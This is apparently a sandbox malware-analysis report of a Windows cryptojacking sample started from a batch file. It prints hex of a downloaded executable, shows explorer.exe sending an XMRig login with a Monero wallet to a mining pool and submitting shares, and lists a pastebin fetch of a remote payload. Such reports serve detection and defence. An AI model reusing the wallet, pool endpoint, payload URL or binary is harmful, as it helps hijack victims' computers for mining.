2024-10-08 12:02:24 UTC	903	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5288736 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "3001d187fa95921871c14fec1b19059125924583728a622c58c5afbf374e330d" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: AB65:39A63E:C33CE4:D01C39:67051F50 Accept-Ranges: bytes Date: Tue, 08 Oct 2024 12:02:24 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890090-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1728388944.117409,VS0,VE184 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 1af4e6de39312c215a201ed5fd8bbe717fc64933 Expires: Tue, 08 Oct 2024 12:07:24 GMT Source-Age: 0
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 21 4f 01 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 9a 00 00 00 ec 4f 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 51 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd!Og"O@@Q`
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 41 56 56 57 53 48 83 ec 20 65 48 8b 04 25 30 00 00 00 48 8b 78 08 48 8b 35 c9 9e 00 00 31 c0 f0 48 0f b1 3e 0f 94 c3 74 2e 48 39 c7 74 29 4c 8b 35 69 c0 00 00 66 0f 1f 84 00 00 00 00 00 b9 e8 03 00 00 41 ff d6 31 c0 f0 48 0f b1 3e 0f 94 c3 74 05 48 39 c7 75 e7 48 8b 3d 90 9e 00 00 8b 07 83 f8 01 75 0c b9 1f 00 00 00 e8 4f 96 00 00 eb 27 83 3f 00 74 09 c6 05 a1 5e 50 00 01 eb 19 c7 07 01 00 00 00 48 8b 0d 7a 9e 00 00 48 8b 15 7b 9e 00 00 e8 46 96 00 00 8b 07 83 f8 01 75 19 48 8b 0d 50 9e 00 00 48 8b 15 51 9e 00 00 e8 2c 96 00 00 c7 07 02 00 00 00 84 db 74 05 31 c0 48 87 06 48 8b 05 e6 9d 00 00 48 8b 00 48 85 c0 74 10 31 c9 ba 02 00 00 00 45 31 c0 ff 15 c6 8d 50 00 e8 39 06 00 00 48 8d 0d c2 0b 00 00 ff 15 a4 bf 00 00 48 8b 0d e5 9d 00 00 48 89 01 48 8d 0d Data Ascii: AVVWSH eH%0HxH51H>t.H9t)L5ifA1H>tH9uH=uO'?t^PHzH{FuHPHQ,t1HHHHt1E1P9HHHH
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 83 ec 20 80 3d ba 59 50 00 00 74 08 48 83 c4 20 5b 5f 5e c3 c6 05 a9 59 50 00 01 48 8b 35 b2 99 00 00 8b 06 83 f8 ff 75 1f b8 ff ff ff ff 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 8d 48 02 ff c0 48 83 3c ce 00 75 f4 85 c0 74 25 89 c7 48 ff cf 48 89 fb 0f 1f 84 00 00 00 00 00 48 8b 44 fe 08 ff 15 dd 88 50 00 48 ff cb 85 ff 48 89 df 75 eb 48 8d 0d c4 fe ff ff 48 83 c4 20 5b 5f 5e e9 28 fc ff ff cc cc cc cc cc cc cc cc 31 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 48 83 ec 28 48 8b 05 63 99 00 00 83 38 02 74 06 c7 00 02 00 00 00 83 fa 01 74 3c 83 fa 02 75 41 48 8d 35 0f b7 00 00 48 8d 3d 08 b7 00 00 48 39 f7 75 14 eb 2c 66 0f 1f 84 00 00 00 00 00 48 83 c7 08 48 39 fe 74 1a 48 8b 07 48 85 c0 74 ef ff 15 51 88 50 00 eb e7 ba 01 00 00 00 e8 1d 09 00 00 Data Ascii: =YPtH [_^YPH5ufffff.HH<ut%HHHDPHHuHH [_^(1VWH(Hc8tt<uAH5H=H9u,fHH9tHHtQP
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 00 4a 8d 0c fd 00 00 00 00 4c 8d 24 89 4e 89 74 20 20 42 c7 04 20 00 00 00 00 e8 8b 08 00 00 41 8b 4e 0c 48 01 c1 48 8b 05 75 54 50 00 4a 89 4c 20 18 48 8d 54 24 28 41 b8 30 00 00 00 ff 15 af b5 00 00 48 85 c0 0f 84 91 00 00 00 8b 44 24 4c 83 f8 07 7e 13 83 f8 08 74 51 83 f8 40 74 4c 3d 80 00 00 00 74 45 eb 10 41 b8 04 00 00 00 83 f8 02 74 0b 83 f8 04 74 33 41 b8 40 00 00 00 48 8b 4c 24 28 48 8b 05 18 54 50 00 4f 8d 14 bf 4e 8d 0c d0 4a 89 4c d0 08 48 8b 54 24 40 4a 89 54 d0 10 ff 15 43 b5 00 00 85 c0 74 52 ff 05 f9 53 50 00 48 89 f1 48 89 da 49 89 f8 e8 9b 8b 00 00 90 48 83 c4 58 5b 5f 5e 41 5c 41 5e 41 5f c3 48 8d 0d dc 95 00 00 48 89 f2 e8 3d 00 00 00 41 8b 56 08 48 8b 05 ba 53 50 00 4b 8d 0c bf 4c 8b 44 c8 18 48 8d 0d d9 95 00 00 e8 1d 00 00 00 ff 15 Data Ascii: JL$Nt B ANHHuTPJL HT$(A0HD$L~tQ@tL=tEAtt3A@HL$(HTPONJLHT$@JTCtRSPHHIHX[_^A\A^A_HH=AVHSPKLDH
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 4f 50 00 01 00 00 00 e9 de 00 00 00 e8 d7 f6 ff ff e9 d4 00 00 00 83 3d 53 4f 50 00 00 0f 84 c7 00 00 00 48 8d 0d 4e 4f 50 00 ff 15 20 b0 00 00 48 8b 3d 69 4f 50 00 48 85 ff 0f 84 9d 00 00 00 48 8b 1d 39 b0 00 00 4c 8b 35 0a b0 00 00 eb 11 0f 1f 84 00 00 00 00 00 48 8b 7f 10 48 85 ff 74 7c 8b 0f ff d3 48 89 c6 41 ff d6 85 c0 75 e9 48 85 f6 74 e4 48 8b 47 08 48 89 f1 ff 15 ff 7d 50 00 eb d5 48 8d 0d ee 4e 50 00 ff 15 d8 af 00 00 8b 05 da 4e 50 00 83 f8 01 75 4f 48 8b 0d fe 4e 50 00 48 85 c9 74 12 90 48 8b 71 10 e8 77 87 00 00 48 89 f1 48 85 f6 75 ef 48 c7 05 dc 4e 50 00 00 00 00 00 c7 05 a2 4e 50 00 00 00 00 00 48 8d 0d a3 4e 50 00 ff 15 6d af 00 00 eb 0d 48 8d 0d 94 4e 50 00 ff 15 7e af 00 00 b8 01 00 00 00 48 83 c4 28 5b 5f 5e 41 5e c3 cc cc cc cc cc cc Data Ascii: OP=SOPHNOP H=iOPHH9L5HHt\|HAuHtHGH}PHNPNPuOHNPHtHqwHHuHNPNPHNPmHNP~H([_^A^
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 98 00 00 00 b9 05 00 00 00 31 d2 45 31 c0 e8 60 ee ff ff 85 c0 0f 88 ef 00 00 00 48 8b 3c 25 40 00 00 00 80 3d 3b 4a 50 00 00 0f 84 0d 06 00 00 48 8d b4 24 38 01 00 00 80 3d 81 4b 50 00 00 74 5a 66 0f 6f 05 5d 4b 50 00 66 0f fd 05 25 8e 00 00 66 0f db 05 2d 8e 00 00 66 0f 7f 05 45 4b 50 00 f3 0f 7e 05 4d 4b 50 00 66 0f fd 05 25 8e 00 00 66 0f db 05 2d 8e 00 00 66 0f d6 05 35 4b 50 00 8b 05 37 4b 50 00 83 c0 2d 0f b6 c0 66 89 05 2a 4b 50 00 c6 05 25 4b 50 00 00 48 8d 15 04 4b 50 00 41 b8 0c 00 00 00 48 89 f9 e8 66 81 00 00 c7 84 24 30 01 00 00 30 00 00 00 66 0f ef c0 f3 0f 7f 06 c7 46 10 00 00 00 00 f3 0f 7f 46 18 48 8b 04 25 50 00 00 00 48 89 84 24 d8 00 00 00 48 c7 84 24 e0 00 00 00 00 00 00 00 48 8d 4c 24 58 4c 8d 84 24 30 01 00 00 4c 8d 8c 24 d8 00 00 Data Ascii: 1E1`H<%@=;JPH$8=KPtZfo]KPf%f-fEKP~MKPf%f-f5KP7KP-f*KP%KPHKPAHf$00fFFH%PH$H$HL$XL$0L$
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 4c 89 64 24 40 8b 84 24 c8 03 00 00 89 44 24 38 0f 11 74 24 20 c7 44 24 30 00 00 00 00 41 b8 ff ff 1f 00 41 b9 ff ff 1f 00 e8 7a e8 ff ff 48 c7 c1 ff ff ff ff 48 8d 54 24 60 4c 8d 84 24 90 00 00 00 41 b9 00 80 00 00 e8 2e e8 ff ff 48 c7 c1 ff ff ff ff 48 89 da 49 89 f0 41 b9 00 80 00 00 e8 16 e8 ff ff 48 8b 4c 24 68 e8 a3 e7 ff ff 48 8b 4c 24 58 e8 99 e7 ff ff 0f 28 b4 24 40 03 00 00 48 81 c4 58 03 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 c6 05 d2 45 50 00 01 48 b8 9d 00 80 00 80 00 9d 00 48 89 05 b7 45 50 00 66 c7 05 b6 45 50 00 41 00 48 8d 0d b7 00 00 00 e8 62 e6 ff ff c6 05 3b 44 50 00 01 80 3d 9e 45 50 00 00 0f 85 5e fb ff ff e9 95 fb ff ff c6 05 7c 45 50 00 01 66 0f 6f 05 1a 88 00 00 66 0f 7f 05 52 45 50 00 48 b8 01 00 38 00 4b 00 38 00 48 89 05 Data Ascii: Ld$@$D$8t$ D$0AAzHHT$`L$A.HHIAHL$hHL$X($@HX[]_^A\A]A^A_EPHHEPfEPAHb;DP=EP^\|EPfofREPH8K8H
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: e6 73 2f 41 8d 42 85 3c e6 73 37 41 8d 42 c6 3c f6 73 35 b8 3f 00 00 00 41 83 fa 2f 74 02 31 c0 41 83 fa 2b 41 0f 44 c1 eb 2b 0f 1f 84 00 00 00 00 00 41 83 c2 bf eb 1a 66 2e 0f 1f 84 00 00 00 00 00 41 83 c2 b9 eb 0a 41 83 c2 04 66 0f 1f 44 00 00 44 89 d0 46 0f b6 54 33 03 45 8d 5a a5 41 80 fb e6 73 2d 45 8d 5a 85 41 80 fb e6 73 33 45 8d 5a c6 41 80 fb f6 73 2f 41 bb 3f 00 00 00 41 83 fa 2f 74 03 45 31 db 41 83 fa 2b 45 0f 44 d9 eb 23 41 83 c2 bf eb 1a 66 2e 0f 1f 84 00 00 00 00 00 41 83 c2 b9 eb 0a 41 83 c2 04 66 0f 1f 44 00 00 45 89 d3 c1 e2 12 41 c1 e0 0c 41 09 d0 c1 e0 06 44 09 d8 44 09 c0 41 89 c0 41 c1 e8 10 48 8d 51 01 44 88 44 0d 00 4c 8b 06 4c 39 c2 73 0e 88 64 0d 01 48 83 c1 02 4c 8b 06 48 89 ca 4c 39 c2 0f 83 2b fe ff ff 88 44 15 00 48 ff c2 e9 Data Ascii: s/AB<s7AB<s5?A/t1A+AD+Af.AAfDDFT3EZAs-EZAs3EZAs/A?A/tE1A+ED#Af.AAfDEAADDAAHQDDLL9sdHLHL9+DH
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 84 3a 50 00 c6 05 7f 3a 50 00 00 48 8d 15 6e 3a 50 00 48 89 f1 e8 b6 71 00 00 48 89 f1 48 89 da e8 9b 71 00 00 48 c7 84 24 80 00 00 00 00 00 00 00 48 89 f1 e8 a7 71 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 8c 24 82 00 00 00 66 89 84 24 80 00 00 00 48 89 b4 24 88 00 00 00 0f 57 f6 0f 29 b4 24 d0 00 00 00 0f 29 b4 24 e0 00 00 00 c7 84 24 d0 00 00 00 30 00 00 00 c7 84 24 e8 00 00 00 40 00 00 00 48 8d 84 24 80 00 00 00 48 89 84 24 e0 00 00 00 0f 29 b4 24 f0 00 00 00 48 c7 44 24 60 00 00 00 00 0f 29 b4 24 b0 00 00 00 c7 44 24 50 00 00 00 00 48 c7 44 24 48 00 00 00 00 c7 44 24 40 20 00 00 00 c7 44 24 38 00 00 00 00 c7 44 24 30 03 00 00 00 c7 44 24 28 80 00 00 00 48 c7 44 24 20 00 00 00 00 48 8d 4c 24 60 4c 8d 84 24 d0 00 00 00 48 8d b4 24 b0 00 00 00 ba 00 00 11 Data Ascii: :P:PHn:PHqHHqH$HqEf$f$H$W)$)$$0$@H$H$)$HD$`)$D$PHD$HD$@ D$8D$0D$(HD$ HL$`L$H$
2024-10-08 12:02:24 UTC	1378	IN	Data Raw: 24 40 00 00 00 00 e8 73 6c 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 4c 24 42 66 89 44 24 40 48 89 7c 24 48 0f 57 c0 0f 29 44 24 50 0f 29 44 24 60 c7 44 24 50 30 00 00 00 c7 44 24 68 40 00 00 00 48 8d 44 24 40 48 89 44 24 60 0f 29 44 24 70 48 c7 44 24 28 00 00 00 00 48 8d 4c 24 28 4c 8d 44 24 50 ba 06 00 03 00 e8 9d d8 ff ff 85 c0 78 42 48 c7 44 24 30 00 00 00 00 48 89 f1 e8 fd 6b 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 4c 24 32 66 89 44 24 30 48 89 74 24 38 48 8b 4c 24 28 48 8d 54 24 30 e8 9d d8 ff ff 48 8b 4c 24 28 e8 3a d7 ff ff 90 48 81 c4 88 00 00 00 5f 5e c3 cc 41 57 41 56 41 55 41 54 56 57 55 53 48 81 ec 48 05 00 00 4c 89 ce 48 89 d0 48 89 ca 4c 8b 8c 24 b0 05 00 00 4c 89 44 24 20 c7 44 24 28 01 00 00 00 48 8d 4c 24 40 49 89 c0 e8 22 e9 ff ff 48 8b 4c Data Ascii: $@slEfL$BfD$@H\|$HW)D$P)D$`D$P0D$h@HD$@HD$`)D$pHD$(HL$(LD$PxBHD$0HkEfL$2fD$0Ht$8HL$(HT$0HL$(:H_^AWAVAUATVWUSHHLHHL$LD$ D$(HL$@I"HL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49713	95.179.241.203	443	4680	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 12:02:45 UTC	598	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 31 7a 71 55 4a 6d 55 6d 52 39 4d 36 72 54 62 61 45 48 69 58 31 35 44 50 77 70 78 4c 41 6f 56 48 46 69 74 4a 32 43 35 32 32 6d 73 65 32 39 79 46 37 75 75 67 6b 5a 5a 56 32 44 45 33 4b 48 50 70 57 4c 51 65 6d 73 69 47 31 5a 7a 38 34 34 63 65 63 63 44 6b 34 6d 4d 4e 33 4b 73 50 47 70 22 2c 22 70 61 73 73 22 3a 22 66 72 75 6b 74 6f 6f 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"41zqUJmUmR9M6rTbaEHiX15DPwpxLAoVHFitJ2C522mse29yF7uugkZZV2DE3KHPpWLQemsiG1Zz844ceccDk4mMN3KsPGp","pass":"fruktoo","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigi
2024-10-08 12:02:45 UTC	732	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 62 31 34 64 61 32 65 2d 33 31 34 66 2d 34 33 64 35 2d 62 64 64 63 2d 31 32 64 66 38 63 39 31 33 33 36 36 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 33 62 65 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 39 35 66 65 32 36 36 39 30 38 30 62 33 34 64 31 30 65 64 65 36 61 39 65 62 30 38 62 63 38 35 66 66 66 37 30 33 36 37 33 33 65 38 63 38 32 37 32 38 63 39 61 32 65 61 33 39 33 37 33 36 36 64 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"1b14da2e-314f-43d5-bddc-12df8c913366","job":{"blob":"1010e3be94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b80000000095fe2669080b34d10ede6a9eb08bc85fff7036733e8c82728c9a2ea3937366d
2024-10-08 12:03:01 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 33 62 65 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 62 65 63 65 31 63 33 34 35 37 32 39 36 63 61 33 63 61 65 30 32 34 33 33 61 39 66 66 39 39 36 34 65 34 37 38 62 62 38 64 39 32 34 30 64 61 39 30 66 39 61 64 61 37 39 36 31 33 33 38 64 63 30 63 36 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 32 34 64 34 66 32 33 2d 64 34 38 65 2d 34 39 33 64 2d 38 61 32 36 2d 37 62 65 30 33 62 37 37 31 63 32 32 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e3be94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b800000000bece1c3457296ca3cae02433a9ff9964e478bb8d9240da90f9ada7961338dc0c68","job_id":"f24d4f23-d48e-493d-8a26-7be03b771c22","ta
2024-10-08 12:03:06 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 39 62 65 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 37 37 66 63 62 39 64 39 37 63 34 66 35 38 30 66 31 66 34 66 61 65 39 66 34 62 66 62 31 36 34 35 38 66 66 34 64 62 37 31 39 34 31 64 32 62 36 61 39 63 31 30 34 64 38 30 33 36 62 36 39 39 34 36 37 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 65 31 63 65 36 66 36 2d 61 38 30 65 2d 34 32 62 37 2d 61 62 33 35 2d 34 30 62 64 32 36 39 61 31 65 61 38 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f9be94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b80000000077fcb9d97c4f580f1f4fae9f4bfb16458ff4db71941d2b6a9c104d8036b6994670","job_id":"0e1ce6f6-a80e-42b7-ab35-40bd269a1ea8","ta
2024-10-08 12:03:28 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 66 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 64 62 62 34 62 62 38 35 31 34 32 39 31 35 30 38 32 32 34 31 63 38 63 34 38 63 35 35 30 39 38 34 63 63 30 32 37 32 65 64 35 37 32 63 37 34 63 62 37 65 61 33 66 39 32 65 61 63 39 38 31 30 32 31 37 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 63 64 31 64 32 30 32 2d 34 39 65 36 2d 34 62 33 33 2d 39 61 31 61 2d 34 30 38 39 62 30 30 66 38 65 63 65 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108fbf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b800000000dbb4bb85142915082241c8c48c550984cc0272ed572c74cb7ea3f92eac98102178","job_id":"2cd1d202-49e6-4b33-9a1a-4089b00f8ece","ta
2024-10-08 12:03:50 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 35 64 38 62 65 30 37 37 66 66 35 61 64 34 33 61 39 66 33 35 34 32 37 64 32 66 33 66 35 30 37 32 64 61 34 64 36 31 63 34 34 38 33 32 62 32 31 62 35 36 32 37 38 37 39 36 30 31 30 65 38 33 32 34 37 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 38 31 37 36 38 66 65 2d 61 32 39 32 2d 34 30 36 39 2d 39 34 64 61 2d 62 61 39 31 66 63 62 64 65 38 31 31 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a5bf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b8000000005d8be077ff5ad43a9f35427d2f3f5072da4d61c44832b21b56278796010e83247a","job_id":"881768fe-a292-4069-94da-ba91fcbde811","ta
2024-10-08 12:03:59 UTC	256	OUT	Data Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 62 31 34 64 61 32 65 2d 33 31 34 66 2d 34 33 64 35 2d 62 64 64 63 2d 31 32 64 66 38 63 39 31 33 33 36 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 38 31 37 36 38 66 65 2d 61 32 39 32 2d 34 30 36 39 2d 39 34 64 61 2d 62 61 39 31 66 63 62 64 65 38 31 31 22 2c 22 6e 6f 6e 63 65 22 3a 22 36 34 30 38 30 30 30 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 36 30 35 33 63 32 30 62 38 63 63 61 63 38 64 61 63 32 39 66 38 34 31 35 39 32 64 34 34 30 65 33 37 63 65 62 62 32 30 35 61 36 64 65 39 36 38 32 30 37 63 34 65 34 39 38 39 35 64 31 30 30 30 30 22 2c 22 61 6c 67 6f 22 3a 22 72 78 2f 30 22 7d 7d 0d Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"1b14da2e-314f-43d5-bddc-12df8c913366","job_id":"881768fe-a292-4069-94da-ba91fcbde811","nonce":"64080000","result":"6053c20b8ccac8dac29f841592d440e37cebb205a6de968207c4e49895d10000","algo":"rx/0"}}
2024-10-08 12:03:59 UTC	63	IN	Data Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4f 4b 22 7d 7d 0a Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}
2024-10-08 12:04:01 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 63 38 32 39 39 61 64 62 34 36 64 35 36 63 33 37 64 31 32 35 38 65 30 64 65 63 33 36 39 61 38 30 33 66 66 64 61 39 39 37 66 63 30 64 30 38 31 33 61 66 62 38 65 36 37 61 39 36 32 39 63 62 61 35 37 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 36 36 38 36 31 31 61 2d 35 30 64 33 2d 34 38 64 30 2d 61 30 35 36 2d 34 39 61 37 66 31 39 62 65 62 36 35 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a5bf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b800000000c8299adb46d56c37d1258e0dec369a803ffda997fc0d0813afb8e67a9629cba57a","job_id":"1668611a-50d3-48d0-a056-49a7f19beb65","ta
2024-10-08 12:04:11 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 33 66 63 35 30 61 62 63 66 64 37 35 62 38 37 66 31 35 62 37 33 30 33 33 32 35 61 62 32 36 30 32 31 64 61 31 63 37 39 64 32 63 61 39 31 32 66 38 37 32 39 65 36 65 37 32 31 36 36 31 34 66 35 31 37 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 37 62 30 37 64 62 66 2d 34 34 39 64 2d 34 32 66 39 2d 39 63 30 65 2d 62 39 64 30 31 38 64 36 65 33 64 32 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bbbf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b8000000003fc50abcfd75b87f15b7303325ab26021da1c79d2ca912f8729e6e7216614f517f","job_id":"57b07dbf-449d-42f9-9c0e-b9d018d6e3d2","ta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49714	104.20.4.235	443	4680	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 12:02:46 UTC	114	OUT	GET /raw/FBXiGyZ9 HTTP/1.1 Accept: / Connection: close Host: pastebin.com User-Agent: cpp-httplib/0.12.6

Target ID:	0
Start time:	08:02:18
Start date:	08/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "
Imagebase:	0x7ff716550000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:02:18
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
